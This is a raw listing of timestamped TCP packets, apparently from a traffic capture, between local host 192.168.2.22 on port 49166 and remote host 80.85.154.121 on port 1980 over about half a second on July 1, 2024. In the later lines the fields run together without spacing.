Jul 1, 2024 13:58:11.507683039 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.507690907 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.507718086 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.507770061 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.507802963 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.507812977 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.507838011 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.513607979 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.532370090 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.534905910 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.643583059 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.643682957 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.643714905 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.643771887 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.643785954 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.643809080 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.643843889 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.643857956 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.643882036 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.643934011 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.643969059 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.643979073 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.644021034 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.644056082 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.644071102 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.644090891 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.644143105 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.644175053 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.644192934 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.644210100 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.644243002 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.644277096 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.644290924 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.644313097 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.644346952 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.644382000 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.644393921 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.644418955 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.644469976 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.644521952 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.644542933 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.644577026 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.644612074 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.644623995 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.644649029 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.644694090 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.644754887 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.644804955 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.644839048 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.644871950 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.644885063 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.644906998 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.644941092 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.644975901 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.644988060 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.645028114 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.645080090 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.645117998 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.645128012 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.645155907 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.645190001 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.645237923 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.645390987 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.645423889 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.645458937 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.645493031 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.645507097 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.645526886 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.645560026 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.645593882 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.645610094 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.645629883 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.645663977 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.645699024 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.645713091 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.648724079 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.648753881 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.648782969 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.648813963 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.648849010 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.648885012 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.648904085 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.648919106 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.648953915 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.648997068 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.649619102 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.649656057 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.649707079 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.649739981 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.649760008 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.649794102 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.649844885 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.649878979 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.649893045 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.649909973 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.649959087 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.649966002 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.650003910 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.650037050 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.650052071 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.650072098 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.650104046 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.650136948 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.650152922 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.650176048 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.650213957 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.650245905 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.650262117 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.650283098 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.651638031 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.656902075 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.656959057 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.657011986 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.657047033 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.657077074 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.657100916 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.657150030 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.657155991 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.657191038 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.657223940 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.657253027 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.657269955 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.657306910 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.657361031 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.657393932 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.657413006 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.657427073 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.657459974 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.657494068 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.657512903 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.657532930 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.657567024 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.657614946 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.658816099 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.661895037 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.662640095 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.662693024 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.662807941 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.662837029 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.662853956 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.662890911 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.662925005 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.662955046 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.662976980 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.663009882 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.663024902 CEST  49166  1980  192.168.2.22  80.85.154.121
Jul 1, 2024 13:58:11.663044930 CEST  1980  49166  80.85.154.121  192.168.2.22
Jul 1, 2024 13:58:11.663620949 CEST  49166  1980  192.168.2.22  80.85.154.121
                        Jul 1, 2024 13:58:11.675295115 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.793320894 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.793379068 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.793414116 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.793452978 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.793477058 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.793529987 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.793566942 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.793581963 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.793622017 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.793672085 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.793673038 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.793708086 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.793759108 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.793765068 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.793793917 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.793844938 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.793878078 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.793894053 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.793929100 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.793962955 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794012070 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.794030905 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794064045 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794100046 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794111967 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.794136047 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794166088 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794184923 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.794200897 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794235945 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794250965 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.794270039 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794303894 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794336081 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794349909 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.794370890 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794423103 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794457912 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794471979 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.794509888 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794543982 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794576883 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794591904 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.794612885 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794663906 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794698954 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794712067 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.794754982 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794789076 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794822931 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794836998 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.794861078 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794908047 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.794912100 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794945955 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.794979095 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795013905 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795025110 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.795064926 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795099974 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795133114 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795147896 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.795167923 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795219898 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795222044 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.795275927 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795308113 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795340061 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795353889 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.795373917 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795408010 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795424938 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.795443058 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795480013 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795492887 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.795512915 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795546055 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795578957 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795595884 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.795614004 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795648098 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795682907 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795697927 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.795717001 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795751095 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795783997 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795798063 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.795819044 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795852900 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795870066 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.795890093 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.795938969 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.798218966 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.798254013 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.798306942 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.798357964 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.798358917 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.798393965 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.798427105 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.798477888 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.798480988 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.798515081 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.798548937 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.798566103 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.798583031 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.798636913 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.798686981 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.798686981 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.798723936 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.798753023 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.798801899 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.798810005 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.798867941 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.798899889 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.798914909 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.798955917 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799004078 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.799010038 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799045086 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799093962 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799097061 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.799149036 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799181938 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799200058 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.799216986 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799268007 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799314022 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.799318075 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799351931 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799386024 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799402952 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.799417019 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799448967 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799465895 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.799484015 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799518108 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799530029 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.799551964 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799593925 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799607038 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.799628973 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799664021 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799679041 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.799699068 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799734116 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799768925 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799786091 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.799801111 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799835920 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799850941 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.799870968 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799906015 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.799921989 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.803756952 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.803786993 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.804028034 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.804056883 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.804063082 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.804071903 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.804114103 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.804146051 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.804150105 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.804179907 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.804213047 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.804225922 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.804248095 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.804280996 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.804325104 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.883723021 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.883759975 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.883821011 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.883824110 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.883872986 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.883907080 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.883928061 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.883939981 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.883991957 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884023905 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884033918 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.884059906 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884093046 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884126902 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884135962 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.884160995 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884196043 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884227991 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884243965 CEST491661980192.168.2.2280.85.154.121
                        Jul 1, 2024 13:58:11.884263992 CEST19804916680.85.154.121192.168.2.22
                        Jul 1, 2024 13:58:11.884294033 CEST19804916680.85.154.121192.168.2.22
